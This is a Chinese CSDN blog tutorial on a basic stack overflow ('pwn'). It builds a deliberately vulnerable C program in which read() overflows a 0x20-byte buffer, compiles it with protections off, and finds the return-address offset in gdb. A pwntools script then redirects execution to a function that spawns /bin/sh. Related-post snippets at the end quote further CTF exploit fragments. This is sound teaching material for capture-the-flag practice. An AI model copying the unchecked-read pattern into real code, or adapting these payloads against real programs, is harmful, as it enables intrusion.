一个简单的pwn例子---read函数

最新推荐文章于 2024-04-12 08:12:30 发布
最新推荐文章于 2024-04-12 08:12:30 发布
阅读量3.8k 收藏 13
点赞数 2
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41683305/article/details/105014197
版权

内容:

#include<stdio.h>
void exploit()
{
    system("/bin/sh");
}
void func()
{
    char str[0x20];
    read(0, str, 0x50);
}
int main()
{
    func();
    return 0;
}

我们要做的是利用溢出执行exploit函数

分析:
先执行func函数,func函数里有个read函数,read函数会读取我们在屏幕上输入的内容,但不会检查内容的多少,全部复制到str里,但str只能存取20个,如果超出这个值,会造成溢出,我们利用溢出,将ret的返回地址改为exlpoit的地址就可以取执行exploit函数了。

首先,把保护机制关了

gcc -no-pie -fno-stack-protector -z execstack -m32 -g -o  11.exe read.c

在这里插入图片描述
gdb运行调试

gdb 11.exe
start

在这里插入图片描述
找到exlpoit的首地址:0x804843b
在这里插入图片描述
查看main的反汇编:
在这里插入图片描述
调用func函数后,回来执行mov eax,0x0

我们再查看func的反汇编
在这里插入图片描述
执行ret语句后就去执行mov eax,0x0,func函数调用了read函数,我们要利用read函数产生溢出,让执行ret完去执行exploit函数。这个时候我们看看栈内容。
push ebp之前,esp的内容是mov eax,0x0的eip值,lea eax,[ebp-0x28] 是read读取内容的首地址,所以我们让执行ret完去执行exploit函数,只需让exploit的地址去覆盖栈里面mov eax,0x0的eip值,从ebp-0x28mov eax,0x0的eip值,地址相差0x28+0x4,因为在func函数里先push 了edp,所以还要加上0x4。

利用程序:

from pwn import *
p=process('./11.exe')   //文件路径
offset = 0x28+0x4
payload ='a'*offset+p32(0x804843b) //0x804843b是exploit首地址
p.sendline(payload)
p.interactive()

运行,成功获得权限
在这里插入图片描述

p0inter
关注
  • 2
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn常用函数
m0_49959202的博客
09-23 1088
文章目录pwn常用函数1.输入输出类1.1 write()函数1.2 read()函数1.3 scanf()函数1.4 fputs()函数1.5 fgets()函数1.6 puts()函数1.7 gets()函数2.转换类2.1 atoi()函数2.2 strtoul()函数3.过滤类3.1 seccomp()函数4.执行类4.1 execve()函数4.2 system()函数 pwn常用函数 1.输入输出类 1.1 write()函数 **函数原型:**ssize_t write(int fd, con
pwn100
pppp974的博客
07-18 253
这是一道64位的题,用rop来最终解决 exp如下: #coding:utf-8 from pwn import * from LibcSearcher import * io=remote('111.198.29.45',5) readn = 0x40063D start = 0x40068E read_got = 0x601028 put_plt = 0x400500 put_got = ...
arg是什么函数_CTF必备技能丨Linux Pwn入门教程——针对函数重定位流程的相关测试(上)...
weixin_39799565的博客
11-23 217
Linux Pwn入门教程系列分享如约而至,本套课程是作者依据i春秋Pwn入门课程中的技术分类,并结合近几年赛事中出现的题目和文章整理出一份相对完整的Linux Pwn教程。教程仅针对i386/amd64下的Linux Pwn常见的Pwn手法,如栈,堆,整数溢出,格式化字符串,条件竞争等进行介绍,所有环境都会封装在Docker镜像当中,并提供调试用的教学程序,来自历年赛事的原题和带有注释的pyth...
一个简单例子入门pwn
阿龙丶的博客
09-13 1167
首先,pwn大概是pwn to own的意思,就是通过二进制/系统调用等方式获得目标主机的shell; 我直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令; 所需要的工具安装等,可以先看这个链接(https://blog.csdn.net/qq_40827990/article/details/83217716) 例子下载地址:https://download.csdn.net/download/qq_40827990/10740077 https://..
PWN-题解
2301_79215333的博客
02-20 693
检查文件,64位,开启NX保护拖入IDA打开,查看主函数双击查看可以看到buf的长度只有0x80,即可用栈大小只有108字节,但是read()并没有限制输入,显然存在栈溢出漏洞。在Functions window可以看到有一个callsystem()函数,按F5反汇编可以看到这是一个系统调用,存在system(“/bin/sh”)即使用栈溢出令返回地址指向该函数地址即可。
pwn学习系列--任务4 pwn200
weixin_44113469的博客
02-11 842
栈溢出之pwn200解题步骤 主要涉及到Ret2libc–修改返回地址,让其指向内存中已有的某个函数,还涉及到简单的rop( Return Oriented Programming )构造 思路分析:有read函数,变量buf大小为0x68,read可写入0x100,可知有栈溢出。题目中只给出system函数,没有给出“/bin/sh”,所以要自己通过read函数写入“/bin/sh”,然后返回调...
speedmaze-read-only.zipIOS应用例子源码下载
03-06
speedmaze-read-only.zipIOS应用例子源码下载speedmaze-read-only.zipIOS应用例子源码下载 1.适合学生学习研究参考 2.适合个人学习研究参考 3.适合公司开发项目技术参考
manzana-read-only.zipIOS应用例子源码下载
03-06
manzana-read-only.zipIOS应用例子源码下载manzana-read-only.zipIOS应用例子源码下载 1.适合学生学习研究参考 2.适合个人学习研究参考 3.适合公司开发项目技术参考
abc.rar_ABC_vc-read-bmp
09-19
在本项目中,"abc.rar_ABC_vc-read-bmp" 是一个关于使用Visual C++(VC)编程语言实现读取BMP图像的示例代码压缩包。这个程序利用了Windows API中的文档句柄来处理BMP文件,使得程序能够兼容多种不同格式的位图。...
Read-from-Digital-Line.rar_labview Read-Line
09-21
标题中的“Read-from-Digital-Line.rar_labview Read-Line”表明这是一个关于LabVIEW(Laboratory Virtual Instrument Engineering Workbench)编程的示例项目,专注于从数字线读取数据。LabVIEW是美国国家仪器公司...
read-write-kinesis-stream:一个使用python lambdas读写AWS kinesis流的小例子
05-11
一个使用python lambdas读写AWS kinesis流的小例子 为此,我们需要三件事: 运动学流 将数据写入流的lambda Lambda从流中读取数据 您可以从aws命令行创建kinesis流,但是出于本演示的目的,我选择从aws控制台创建...
NI-VISA常用函数
03-05
VISA常用函数,中文版,适用于做VISA开发的人员。
Karma-Read-JSON:Karma 辅助函数使读取 JSON 文件更容易
06-10
业力读取JSON Karma 辅助函数使读取 JSON 文件更容易 安装 ...在您的测试中使用readJSON函数例子: var valid_respond = readJSON('json/foobar.json'); $httpBackend.whenGET(/.*/).respond
csv-utils:一小套CSV实用程序
05-03
CSV实用程序一小套CSV实用程序这是一个node.js项目,旨在提供一个简单的界面,允许开发人员读取和写入CSV /文本文件。安装npm install @danieldsf/csv-utils 例子读取当前目录(“ test.csv”)中的文件并检索其标题...
rt-thread mcp2515驱动程序参考
11-01
2. **发送CAN消息函数**:此函数接收一个包含CAN ID、数据长度和数据的结构体,然后将这些信息编码并发送给MCP2515。在发送过程中,驱动程序需要处理CAN报文的各种格式,如标准ID和扩展ID,以及数据帧和远程帧的区别...
PWN基础之构造ROP链(基本ROP)
最新发布
qq_53058639的博客
04-12 976
​随着 NX 保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是(Return Oriented Programming),其主要思想是在**栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets)来改变某些寄存器或者变量的值,从而控制程序的执行流程。**所谓 gadgets 就是以 ret结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。
pwn——20180831
原味瓜子、的博客
09-01 1046
Get a shell , come on ! 题目:https://pan.baidu.com/s/1dTE2MxfBvVYTS0MhJwj_vw 提取码:7wbc 工具: 题解: 1、首先file stack_3一下,32位的,gdb ./stack_3一下,run一下,输入即报错。 用ida打开,点进main函数,f5编译一下,读一下吧。 2、 int __cdecl mai...
pwn的一些命令
qq_32388437的博客
07-13 1315
gdb 常用命令=======r 执行程序至断点c 继续执行程序s 单步执行n 步过执行x 查看指定地址的内存地址的值  x/(n,f,u为可选参数) n为需要显示的内存单元个数  f为显示格式:               x(hex)按十六进制格式显示变量。               d(decimal)按十进制格式显示变量。               u(unsigneddecimal)...
c语言中fgets()和read()的区别以及pwn题目中需要设置setbuf的原理。
fjh1997的博客
01-30 1934
fgets是一个c语言函数, read一个系统调用 fgets是标准c函数, read不是 fgets 读取的数据会存到缓冲区, read不会 fgets 通过文件指针读文件, read 使用文件描述符读文件 fgets 遇到回车就停止读取, 而read遇到回车、空格、\x00都不管,它会一直读取你让他读取的字节数,而如果在还没读取完需要的字节数前就已经空了,那么read将分类讨论(在管道通信的情况下,不是读文件): 此时如果没有进程在往这个管道里写东西(也就是把这个管道关闭了),read()就不报错,
一个shell命名read -p的脚本
06-06
可以使用以下代码实现类似于read -p的功能: ```bash #!/bin/bash # 读取用户输入并显示提示信息 read_with_prompt() { local prompt message # 获取提示信息 prompt="$1" message="$2" # 显示提示信息 if [ -n "$message" ]; then echo "$message" fi # 读取用户输入 read -p "$prompt" input_value # 返回用户输入 echo "$input_value" } # 示例用法 name=$(read_with_prompt "请输入您的姓名:" "欢迎使用read_with_prompt脚本!") echo "您好,$name!" ``` 使用示例: ``` $ ./read_with_prompt.sh 请输入您的姓名:张三 您好,张三! ``` 其中,`read_with_prompt()`函数接受两个参数,第一个参数是提示信息,第二个参数是可选的额外说明信息。函数会先显示额外说明信息(如果有的话),然后使用`read -p`读取用户输入。最后,函数会返回用户输入的值。在示例中,我们使用`read_with_prompt()`获取用户的姓名,并在输出中欢迎用户。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值